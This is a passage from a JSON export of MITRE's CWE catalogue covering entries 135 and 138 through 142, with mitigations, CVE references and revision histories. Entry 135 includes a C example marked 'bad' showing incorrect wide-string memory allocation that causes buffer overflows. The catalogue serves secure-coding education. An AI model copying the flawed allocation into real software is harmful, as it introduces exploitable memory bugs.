Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Description, Modes_of_Introduction, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Functional_Areas, Likelihood_of_Exploit, Other_Notes, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Uncontrolled Format String","attr":{"@_Date":"2015-12-07"}}}},"135":{"attr":{"@_ID":"135","@_Name":"Incorrect Calculation of Multi-Byte String Length","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not correctly calculate the length of strings that can contain wide or multi-byte characters.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":{"xhtml:p":["There are several ways in which improper string length checking may result in an exploitable condition. All of these, however, involve the introduction of buffer overflow conditions in order to reach an exploitable state.","The first of these issues takes place when the output of a wide or multi-byte character string, string-length function is used as a size for the allocation of memory. While this will result in an output of the number of characters in the string, note that the characters are most likely not a single byte, as they are with standard character strings. So, using the size returned as the size sent to new or malloc and copying the string to this newly allocated memory will result in a buffer overflow.","Another common way these strings are misused involves the mixing of standard string and wide or multi-byte string functions on a single string. Invariably, this mismatched information will result in the creation of a possibly exploitable buffer overflow condition."]}}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"This weakness may lead to a buffer overflow. Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. This can often be used to subvert any other security service."},{"Scope":["Availability","Confidentiality"],"Impact":["Read Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":"Confidentiality","Impact":"Read Memory","Note":"In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Always verify the length of the string unit character."},{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":"Use length computing functions (e.g. strlen, wcslen, etc.) appropriately with their equivalent type (e.g.: byte, wchar_t, etc.)"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example would be exploitable if any of the commented incorrect malloc calls were used.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;strings.h&gt;#include &lt;wchar.h&gt;int main() {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"wchar_t wideString[] = L\\"The spazzy orange tiger jumped \\" \\\\\\"over the tawny jaguar.\\";wchar_t *newString;printf(\\"Strlen() output: %d\\\\nWcslen() output: %d\\\\n\\",strlen(wideString), wcslen(wideString));/* Wrong because the number of chars in a string isn\'t related to its length in bytes //newString = (wchar_t *) malloc(strlen(wideString));*//* Wrong because wide characters aren\'t 1 byte long! //newString = (wchar_t *) malloc(wcslen(wideString));*//* Wrong because wcslen does not include the terminating null */newString = (wchar_t *) malloc(wcslen(wideString) * sizeof(wchar_t));/* correct! */newString = (wchar_t *) malloc((wcslen(wideString) + 1) * sizeof(wchar_t));/* ... */","xhtml:br":["","","","","","","","","","","","","","","","","","","","","",""]}}}},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"Strlen() output: 0Wcslen() output: 53","xhtml:br":""}}],"Body_Text":"The output from the printf() statement would be:"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper string length checking"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO10-J","Entry_Name":"Ensure the array is filled when using read() to fill an array"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP10","Entry_Name":"Incorrect Buffer Length Computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Unicode and ANSI Buffer Size Mismatches&#34; Page 153"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Gregory Padgett","Contribution_Organization":"Unitrends","Contribution_Date":"2010-01-11","Contribution_Comment":"correction to Demonstrative_Example"},"Previous_Entry_Name":{"#text":"Improper String Length Checking","attr":{"@_Date":"2008-04-11"}}}},"138":{"attr":{"@_ID":"138","@_Name":"Improper Neutralization of Special Elements","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as control elements or syntactic markers when they are sent to a downstream component.","Extended_Description":"Most languages and protocols have their own special elements such as characters and reserved words. These special elements can carry control implications. If software does not prevent external control or influence over the inclusion of such special elements, the control flow of the program may be altered from what was intended. For example, both Unix and Windows interpret the symbol &lt; (\\"less than\\") as meaning \\"read input from a file\\".","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Developers should anticipate that special elements (e.g. delimiters, symbols) will be injected into input vectors of their software system. One defense is to create an allowlist (e.g. a regular expression) that defines valid input according to the requirements specifications. Strictly filter any input that does not match against the allowlist. Properly encode your output, and quote any elements that have special meaning to the component with which you are communicating."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Implementation","Description":"Use and specify an appropriate output encoding to ensure that the special elements are well-defined. A normal byte sequence in one encoding could be a special element in another."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0677","Description":"Read arbitrary files from mail client by providing a special MIME header that is internally used to store pathnames for attachments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0677"},{"Reference":"CVE-2000-0703","Description":"Setuid program does not cleanse special escape sequence before sending data to a mail program, causing the mail program to process those sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0703"},{"Reference":"CVE-2003-0020","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020"},{"Reference":"CVE-2003-0083","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Special Elements (Characters or Reserved Words)"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Custom Special Character Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Notes":{"Note":[{"#text":"This weakness can be related to interpretation conflicts or interaction errors in intermediaries (such as proxies or application firewalls) when the intermediary\'s model of an endpoint does not account for protocol-specific special elements.","attr":{"@_Type":"Relationship"}},{"#text":"See this entry\'s children for different types of special elements that have been observed at one point or another. However, it can be difficult to find suitable CVE examples. In an attempt to be complete, CWE includes some types that do not have any associated observed example.","attr":{"@_Type":"Relationship"}},{"#text":"This weakness is probably under-studied for proprietary or custom formats. It is likely that these issues are fairly common in applications that use their own custom format for configuration files, logs, meta-data, messaging, etc. They would only be found by accident or with a focused effort based on an understanding of the format.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Description, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Special Elements (Characters or Reserved Words)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Special Elements","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"140":{"attr":{"@_ID":"140","@_Name":"Improper Neutralization of Delimiters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes delimiters.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Developers should anticipate that delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Delimiter Problems"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Delimiter Problems","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Delimiters","attr":{"@_Date":"2010-06-21"}}]}},"141":{"attr":{"@_ID":"141","@_Name":"Improper Neutralization of Parameter/Argument Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as parameter or argument delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that parameter/argument delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-0307","Description":"Attacker inserts field separator into input to specify admin privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0307"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Parameter Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;IFS&#34;, Page 604"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Parameter Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Parameter/Argument Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"142":{"attr":{"@_ID":"142","@_Name":"Improper Neutralization of Value Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as value delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that value delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, 